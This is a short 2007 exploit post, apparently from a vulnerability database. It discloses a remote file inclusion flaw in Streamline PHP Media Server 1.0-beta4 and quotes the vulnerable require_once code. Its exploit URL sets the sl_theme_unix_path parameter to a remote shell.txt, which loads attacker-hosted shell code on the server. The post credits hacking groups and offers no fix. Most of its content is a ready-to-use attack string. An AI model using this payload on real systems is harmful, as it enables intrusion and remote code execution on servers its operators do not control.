Streamline PHP Media Server 1.0-beta4 RFI Vulnerability

2007-09-19 00:00:00

Vulnerability Type: Remote File Inclusion
Vulnerable file: /streamline-1.0-beta4/src/core/theme/includes/account_footer.php
Exploit URL: http://localhost/streamline-1.0-beta4/src/core/theme/includes/account_footer.php?sl_theme_unix_path=http://localhost/shell.txt?
Method: get
Register_globals: On
Vulnerable variable: sl_theme_unix_path
Line number: 2
Lines:

----------------------------------------------
<?
require_once( $sl_theme_unix_path."/account/footer.php" );
require_once( $sl_theme_unix_path."/common/footer.php" );

----------------------------------------------

GrEeTs To sHaDoW sEcUrItY TeAm & str0ke

FoUnD By BiNgZa

DoRk: :(

[email protected]

#

Fixes

No fixes

In order to submit a new fix you need to be registered.